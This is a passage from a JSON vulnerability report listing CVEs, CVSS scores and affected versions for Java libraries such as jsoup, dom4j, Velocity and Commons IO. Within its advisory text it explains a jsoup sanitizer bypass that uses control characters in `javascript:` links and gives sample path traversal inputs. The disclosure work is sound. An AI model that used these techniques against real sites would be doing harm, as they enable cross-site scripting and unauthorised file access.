-26945"]}],"cve":"CVE-2020-26945","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2021-04-22T16:14:38","ids":[{"system_name":"CVE Record","text":"CVE-2020-26945"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"\"Deserialization errors in MyBatis\""},{"category":"details","details":"Vulnerability Details","text":"# \"Deserialization errors in MyBatis\" MyBatis before 3.5.6 mishandles deserialization of object streams leading to potential cache poisoning."}],"product_status":{"known_affected":["org.mybatis/mybatis@vers:maven/>=2.3.5|<=3.5.5"],"known_not_affected":["org.mybatis/mybatis@3.5.6"]},"references":[{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-26945"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-26945"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.1,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["org.mybatis/mybatis@vers:maven/>=2.3.5|<=3.5.5"]}],"title":"CVE-2020-26945/pkg:maven/org.mybatis/mybatis@3.4.6?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-13936"]}],"cve":"CVE-2020-13936","cwe":{"id":"20","name":"Improper Input Validation"},"discovery_date":"2022-01-06T20:32:36","ids":[{"system_name":"CVE Record","text":"CVE-2020-13936"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Gentoo Advisory","text":"glsa-202107-52"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Sandbox Bypass in Apache Velocity Engine"},{"category":"details","details":"Vulnerability Details","text":"# Sandbox Bypass in Apache Velocity Engine An attacker that is able to modify Velocity templates may execute arbitrary Java code or run arbitrary system commands with the same privileges as the account running the Servlet container. This applies to applications that allow untrusted users to upload/modify velocity templates running Apache Velocity Engine versions up to 2.2."}],"product_status":{"known_affected":["org.apache.velocity/velocity@vers:maven/>=1.5|<=1.7"]},"references":[{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2021/03/10/1"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r01043f584cbd47959fabe18fff64de940f81a65024bb8dddbda31d9a%40%3Cuser.velocity.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r01043f584cbd47959fabe18fff64de940f81a65024bb8dddbda31d9a@%3Cuser.velocity.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r0bc98e9cd080b4a13b905c571b9bed87e1a0878d44dbf21487c6cca4@%3Cdev.santuario.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r17cb932fab14801b14e5b97a7f05192f4f366ef260c10d4a8dba8ac9@%3Cdev.ws.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r293284c6806c73f51098001ea86a14271c39f72cd76af9e946d9d9ad@%3Cdev.ws.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r39de20c7e9c808b1f96790875d33e58c9c0aabb44fd9227e7b3dc5da@%3Cdev.ws.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r3ea4c4c908505b20a4c268330dfe7188b90c84dcf777728d02068ae6@%3Cannounce.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r4cd59453b65d4ac290fcb3b71fdf32b4f1f8989025e89558deb5a245@%3Cdev.ws.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r52a5129df402352adc34d052bab9234c8ef63596306506a89fdc7328@%3Cusers.activemq.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r7f209b837217d2a0fe5977fb692e7f15d37fa5de8214bcdc4c21d9a7@%3Ccommits.turbine.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r9dc2505651788ac668299774d9e7af4dc616be2f56fdc684d1170882@%3Cusers.activemq.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb042f3b0090e419cc9f5a3d32cf0baff283ccd6fcb1caea61915d6b6@%3Ccommits.velocity.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rbee7270556f4172322936b5ecc9fabf0c09f00d4fa56c9de1963c340@%3Cdev.ws.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd2a89e17e8a9b451ce655f1a34117752ea1d18a22ce580d8baa824fd@%3Ccommits.druid.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd7e865c87f9043c21d9c1fd9d4df866061d9a08cfc322771160d8058@%3Cdev.ws.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/re641197d204765130618086238c73dd2ce5a3f94b33785b587d72726@%3Cdev.ws.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/re8e7482fe54d289fc0229e61cc64947b63b12c3c312e9f25bf6f3b8c@%3Cdev.ws.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/reab5978b54a9f4c078402161e30a89c42807b198814acadbe6c862c7@%3Cdev.ws.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf7d369de88dc88a1347006a3323b3746d849234db40a8edfd5ebc436@%3Cdev.ws.apache.org%3E"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/03/msg00019.html"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-13936"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-13936"},{"summary":"Gentoo Advisory glsa-202107-52","url":"https://security.gentoo.org/glsa/202107-52"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.8,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.8,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"LOW","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"LOW","scope":"UNCHANGED","temporalScore":8.8,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["org.apache.velocity/velocity@vers:maven/>=1.5|<=1.7"]}],"title":"CVE-2020-13936/pkg:maven/org.apache.velocity/velocity@1.7?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2021-23926"]}],"cve":"CVE-2021-23926","cwe":{"id":"776","name":"Improper Restriction of Recursive Entity References in DTDs"},"discovery_date":"2021-06-16T17:37:11","ids":[{"system_name":"CVE Record","text":"CVE-2021-23926"},{"system_name":"Apache Advisory","text":"XMLBEANS-517"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20210513-0004"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Improper Restriction of Recursive Entity References in Apache XMLBeans"},{"category":"details","details":"Vulnerability Details","text":"# Improper Restriction of Recursive Entity References in Apache XMLBeans The XML parsers used by XMLBeans up to version 2.6.0 did not set the properties needed to protect the user from malicious XML input. Vulnerabilities include possibilities for XML Entity Expansion attacks. Affects XMLBeans up to and including v2.6.0."}],"product_status":{"known_affected":["org.apache.xmlbeans/xmlbeans@vers:maven/>=2.2.0|<=2.6.0"]},"references":[{"summary":"Apache Advisory XMLBEANS-517","url":"https://issues.apache.org/jira/browse/XMLBEANS-517"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r2dc5588009dc9f0310b7382269f932cc96cae4c3901b747dda1a7fed@%3Cjava-dev.axis.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rbb01d10512098894cd5f22325588197532c64f1c818ea7e4120d40c1@%3Cjava-dev.axis.apache.org%3E"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/06/msg00024.html"},{"summary":"Cve 2021","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-23926"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-23926"},{"summary":"NetApp Advisory ntap-20210513-0004","url":"https://security.netapp.com/advisory/ntap-20210513-0004"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":9.1,"baseSeverity":"CRITICAL","confidentialityImpact":"HIGH","environmentalScore":9.1,"environmentalSeverity":"CRITICAL","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":9.1,"temporalSeverity":"CRITICAL","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H","version":"3.1"},"products":["org.apache.xmlbeans/xmlbeans@vers:maven/>=2.2.0|<=2.6.0"]}],"title":"CVE-2021-23926/pkg:maven/org.apache.xmlbeans/xmlbeans@2.3.0?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-10683"]}],"cve":"CVE-2020-10683","cwe":{"id":"611","name":"Improper Restriction of XML External Entity Reference"},"discovery_date":"2020-06-05T16:13:36","ids":[{"system_name":"CVE Record","text":"CVE-2020-10683"},{"system_name":"Owasp Advisory","text":"XML_External_Entity_Prevention_Cheat_Sheet"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpujan2021"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2020"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Oracle Advisory","text":"cpuoct2020"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20200518-0002"},{"system_name":"Red Hat Bugzilla","text":"redhat-bugzilla-1694235"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"dom4j allows External Entities by default which might enable XXE attacks"},{"category":"details","details":"Vulnerability Details","text":"# dom4j allows External Entities by default which might enable XXE attacks dom4j before 2.1.3 allows external DTDs and External Entities by default, which might enable XXE attacks. However, there is popular external documentation from OWASP showing how to enable the safe, non-default behavior in any application that uses dom4j.  Note: This advisory applies to `dom4j:dom4j` version 1.x legacy artifacts. To resolve this a change to the latest version of `org.dom4j:dom4j` is recommended."}],"product_status":{"known_affected":["dom4j/dom4j@vers:maven/>=1.1|<=1.6.1"],"known_not_affected":["dom4j/dom4j@2.1.3"]},"references":[{"summary":"Open Suse Mailing List","url":"http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00061.html"},{"summary":"Red Hat Bugzilla","url":"https://bugzilla.redhat.com/show_bug.cgi?id=1694235"},{"summary":"Owasp Advisory XML_External_Entity_Prevention_Cheat_Sheet","url":"https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r51f3f9801058e47153c0ad9bc6209d57a592fc0e7aefd787760911b8@%3Cdev.velocity.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r91c64cd51e68e97d524395474eaa25362d564572276b9917fcbf5c32@%3Cdev.velocity.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb1b990d7920ae0d50da5109b73b92bab736d46c9788dd4b135cb1a51@%3Cnotifications.freemarker.apache.org%3E"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-10683"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-10683"},{"summary":"NetApp Advisory ntap-20200518-0002","url":"https://security.netapp.com/advisory/ntap-20200518-0002"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpujan2021","url":"https://www.oracle.com/security-alerts/cpujan2021.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpujul2020","url":"https://www.oracle.com/security-alerts/cpujul2020.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"},{"summary":"Oracle Advisory cpuoct2020","url":"https://www.oracle.com/security-alerts/cpuoct2020.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":9.8,"baseSeverity":"CRITICAL","confidentialityImpact":"HIGH","environmentalScore":9.8,"environmentalSeverity":"CRITICAL","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":9.8,"temporalSeverity":"CRITICAL","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["dom4j/dom4j@vers:maven/>=1.1|<=1.6.1"]}],"title":"CVE-2020-10683/pkg:maven/dom4j/dom4j@1.6.1?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-23640"]}],"cve":"CVE-2022-23640","cwe":{"id":"611","name":"Improper Restriction of XML External Entity Reference"},"discovery_date":"2022-03-02T21:30:54","ids":[{"system_name":"CVE Record","text":"CVE-2022-23640"},{"system_name":"GitHub Advisory","text":"GHSA-xvm2-9xvc-hx7f"}],"notes":[{"audience":"developers","category":"other","text":"Improper Restriction of Recursive Entity References in DTDs","title":"Additional CWE: 776"},{"category":"description","details":"Vulnerability Description","text":"Improper Restriction of XML External Entity Reference in com.monitorjbl:xlsx-streamer"},{"category":"details","details":"Vulnerability Details","text":"# Improper Restriction of XML External Entity Reference in com.monitorjbl:xlsx-streamer ### Impact Prior to xlsx-streamer 2.1.0, the XML parser that was used did not apply all the necessary settings to prevent XML Entity Expansion issues.  ### Patches Upgrade to version 2.1.0.  ### Workarounds No known workaround.  ### References https://github.com/monitorjbl/excel-streaming-reader/commit/0749c7b9709db078ccdeada16d46a34bc2910c73  ### For more information If you have any questions or comments about this advisory: * Open an issue in [monitorjbl/excel-streaming-reader](https://github.com/monitorjbl/excel-streaming-reader)"}],"product_status":{"known_affected":["com.monitorjbl/xlsx-streamer@vers:maven/>=0.2.3|<=2.0.0"]},"references":[{"summary":"GitHub Advisory GHSA-xvm2-9xvc-hx7f","url":"https://github.com/monitorjbl/excel-streaming-reader/security/advisories/GHSA-xvm2-9xvc-hx7f"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-23640"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-23640"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":9.8,"baseSeverity":"CRITICAL","confidentialityImpact":"HIGH","environmentalScore":9.8,"environmentalSeverity":"CRITICAL","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":9.8,"temporalSeverity":"CRITICAL","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.monitorjbl/xlsx-streamer@vers:maven/>=0.2.3|<=2.0.0"]}],"title":"CVE-2022-23640/pkg:maven/com.monitorjbl/xlsx-streamer@2.0.0?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-36033"]}],"cve":"CVE-2022-36033","cwe":{"id":"79","name":"Improper Neutralization of Input During Web Page Generation"},"discovery_date":"2022-09-01T22:14:57","ids":[{"system_name":"CVE Record","text":"CVE-2022-36033"},{"system_name":"GitHub Advisory","text":"GHSA-gp7f-rwcx-9369"},{"system_name":"NetApp Advisory","text":"ntap-20221104-0006"},{"system_name":"Jsoup Advisory","text":"release-1"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"jsoup may not sanitize code injection XSS attempts if SafeList.preserveRelativeLinks is enabled"},{"category":"details","details":"Vulnerability Details","text":"# jsoup may not sanitize code injection XSS attempts if SafeList.preserveRelativeLinks is enabled jsoup may incorrectly sanitize HTML including `javascript:` URL expressions, which could allow cross-site scripting (XSS) attacks when a reader subsequently clicks that link. If the non-default `SafeList.preserveRelativeLinks` option is enabled, HTML including `javascript:` URLs that have been crafted with control characters will not be sanitized. If the site that this HTML is published on does not set a Content Security Policy, an XSS attack is then possible.  ### Impact Sites that accept input HTML from users and use jsoup to sanitize that HTML, may be vulnerable to cross-site scripting (XSS) attacks, if they have enabled `SafeList.preserveRelativeLinks` and do not set an appropriate Content Security Policy.  ### Patches This issue is patched in jsoup 1.15.3.  Users should upgrade to this version. Additionally, as the unsanitized input may have been persisted, old content should be cleaned again using the updated version.  ### Workarounds To remediate this issue without immediately upgrading:  - disable `SafeList.preserveRelativeLinks`, which will rewrite input URLs as absolute URLs - ensure an appropriate [Content Security Policy](https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP) is defined. (This should be used regardless of upgrading, as a defence-in-depth best practice.)  ### Background and root cause jsoup includes a [Cleaner](https://jsoup.org/apidocs/org/jsoup/safety/Cleaner.html) component, which is designed to [sanitize input HTML](https://jsoup.org/cookbook/cleaning-html/safelist-sanitizer) against configurable safe-lists of acceptable tags, attributes, and attribute values.  This includes removing potentially malicious attributes such as `<a href=\"javascript:...\">`, which may enable XSS attacks. It does this by validating URL attributes against allowed URL protocols (e.g. `http`, `https`).  However, an attacker may be able to bypass this check by embedding control characters into the href attribute value. This causes the Java URL class, which is used to resolve relative URLs to absolute URLs before checking the URL's protocol, to treat the URL as a relative URL. It is then resolved into an absolute URL with the configured base URI.  For example, `java script:...` would resolve to `https://example.com/java script:...`.  By default, when using a safe-list that allows `a` tags, jsoup will rewrite any relative URLs (e.g. `/foo/`) to an absolute URL (e.g. `https://example.com/foo/`). Therefore, this attack attempt would be successfully mitigated. However, if the option [SafeList.preserveRelativeLinks](https://jsoup.org/apidocs/org/jsoup/safety/Safelist.html#preserveRelativeLinks(boolean)) is enabled (which does not rewrite relative links to absolute), the input is left as-is.  While Java will treat a path like `java script:` as a relative path, as it does not match the allowed characters of a URL spec, browsers may normalize out the control characters, and subsequently evaluate it as a `javascript:` spec inline expression. That disparity then leads to an XSS opportunity.  Sites defining a Content Security Policy that does not allow javascript expressions in link URLs will not be impacted, as the policy will prevent the script's execution.  ### For more information If you have any questions or comments about this advisory: * Open an issue in [jsoup](https://github.com/jhy/jsoup) * Email the author of jsoup at [jonathan@hedley.net](mailto:jonathan@hedley.net)  ### Credits Thanks to Jens Häderer, who reported this issue, and contributed to its resolution."}],"product_status":{"known_affected":["org.jsoup/jsoup@vers:maven/>=0.0.0|<1.15.3"],"known_not_affected":["org.jsoup/jsoup@1.15.3"]},"references":[{"summary":"GitHub Advisory GHSA-gp7f-rwcx-9369","url":"https://github.com/jhy/jsoup/security/advisories/GHSA-gp7f-rwcx-9369"},{"summary":"Jsoup Advisory","url":"https://jsoup.org/news/release-1.15.3"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-36033"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-36033"},{"summary":"NetApp Advisory ntap-20221104-0006","url":"https://security.netapp.com/advisory/ntap-20221104-0006"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"NONE","baseScore":6.1,"baseSeverity":"MEDIUM","confidentialityImpact":"LOW","environmentalScore":6.1,"environmentalSeverity":"MEDIUM","integrityImpact":"LOW","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"LOW","modifiedIntegrityImpact":"LOW","modifiedPrivilegesRequired":"NONE","modifiedScope":"CHANGED","modifiedUserInteraction":"REQUIRED","privilegesRequired":"NONE","scope":"CHANGED","temporalScore":6.1,"temporalSeverity":"MEDIUM","userInteraction":"REQUIRED","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N","version":"3.1"},"products":["org.jsoup/jsoup@vers:maven/>=0.0.0|<1.15.3"]}],"title":"CVE-2022-36033/pkg:maven/org.jsoup/jsoup@1.10.2?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2021-37714"]}],"cve":"CVE-2021-37714","cwe":{"id":"248","name":"Uncaught Exception"},"discovery_date":"2021-08-23T19:42:38","ids":[{"system_name":"CVE Record","text":"CVE-2021-37714"},{"system_name":"GitHub Advisory","text":"GHSA-m72m-mhq2-9p6c"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"NetApp Advisory","text":"ntap-20220210-0022"},{"system_name":"Jsoup Advisory","text":"release-1"}],"notes":[{"audience":"developers","category":"other","text":"Loop with Unreachable Exit Condition","title":"Additional CWE: 835"},{"category":"description","details":"Vulnerability Description","text":"Uncaught Exception in jsoup"},{"category":"details","details":"Vulnerability Details","text":"# Uncaught Exception in jsoup ### Impact _What kind of vulnerability is it? Who is impacted?_ Those using jsoup to parse untrusted HTML or XML may be vulnerable to DOS attacks. If the parser is run on user supplied input, an attacker may supply content that causes the parser to get stuck (loop indefinitely until cancelled), to complete more slowly than usual, or to throw an unexpected exception. This effect may support a denial of service attack.  ### Patches _Has the problem been patched? What versions should users upgrade to?_ Users should upgrade to jsoup 1.14.2  ### Workarounds _Is there a way for users to fix or remediate the vulnerability without upgrading?_ Users may rate limit input parsing. Users should limit the size of inputs based on system resources. Users should implement thread watchdogs to cap and timeout parse runtimes."}],"product_status":{"known_affected":["org.jsoup/jsoup@vers:maven/>=0.0.0|<1.14.2"],"known_not_affected":["org.jsoup/jsoup@1.14.2"]},"references":[{"summary":"GitHub Advisory GHSA-m72m-mhq2-9p6c","url":"https://github.com/jhy/jsoup/security/advisories/GHSA-m72m-mhq2-9p6c"},{"summary":"Jsoup Advisory","url":"https://jsoup.org/news/release-1.14.1"},{"summary":"Jsoup Advisory","url":"https://jsoup.org/news/release-1.14.2"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r215009dbf7467a9f6506d0c0024cb36cad30071010e62c9352cfaaf0@%3Cissues.maven.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r377b93d79817ce649e9e68b3456e6f499747ef1643fa987b342e082e@%3Cissues.maven.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r3d71f18adb78e50f626dde689161ca63d3b7491bd9718fcddfaecba7@%3Cissues.maven.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r50e9c9466c592ca9d707a5dea549524d19e3287da08d8392f643960e@%3Cissues.maven.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r685c5235235ad0c26e86d0ee987fb802c9675de6081dbf0516464e0b@%3Cnotifications.james.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r97404676a5cf591988faedb887d64e278f522adcaa823d89ca69defe@%3Cnotifications.james.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc3354080fc67fb50b45b3c2d12dc4ca2a3c1c78dad3d3ba012c038aa@%3Cnotifications.james.apache.org%3E"},{"summary":"Cve 2021","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-37714"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-37714"},{"summary":"NetApp Advisory ntap-20220210-0022","url":"https://security.netapp.com/advisory/ntap-20220210-0022"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":7.5,"baseSeverity":"HIGH","confidentialityImpact":"NONE","environmentalScore":7.5,"environmentalSeverity":"HIGH","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":7.5,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["org.jsoup/jsoup@vers:maven/>=0.0.0|<1.14.2"]}],"title":"CVE-2021-37714/pkg:maven/org.jsoup/jsoup@1.10.2?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2021-29425"]}],"cve":"CVE-2021-29425","cwe":{"id":"20","name":"Improper Input Validation"},"discovery_date":"2021-04-26T16:04:00","ids":[{"system_name":"Arxiv Advisory","text":"2306"},{"system_name":"CVE Record","text":"CVE-2021-29425"},{"system_name":"Apache Advisory","text":"IO-556"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20220210-0004"}],"notes":[{"audience":"developers","category":"other","text":"Improper Limitation of a Pathname to a Restricted Directory","title":"Additional CWE: 22"},{"category":"description","details":"Vulnerability Description","text":"Path Traversal and Improper Input Validation in Apache Commons IO"},{"category":"details","details":"Vulnerability Details","text":"# Path Traversal and Improper Input Validation in Apache Commons IO In Apache Commons IO before 2.7, When invoking the method FileNameUtils.normalize with an improper input string, like \"//../foo\", or \"\\\\..\\foo\", the result would be the same value, thus possibly providing access to files in the parent directory, but not further above (thus \"limited\" path traversal), if the calling code would use the result to construct a path value."}],"product_status":{"known_affected":["commons-io/commons-io@vers:maven/>=0.1|<=2.6"],"known_not_affected":["commons-io/commons-io@2.7"]},"references":[{"summary":"Arxiv Advisory 2306","url":"https://arxiv.org/pdf/2306.05534.pdf"},{"summary":"Apache Advisory IO-556","url":"https://issues.apache.org/jira/browse/IO-556"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r01b4a1fcdf3311c936ce33d75a9398b6c255f00c1a2f312ac21effe1@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r0bfa8f7921abdfae788b1f076a12f73a92c93cc0a6e1083bce0027c5@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing 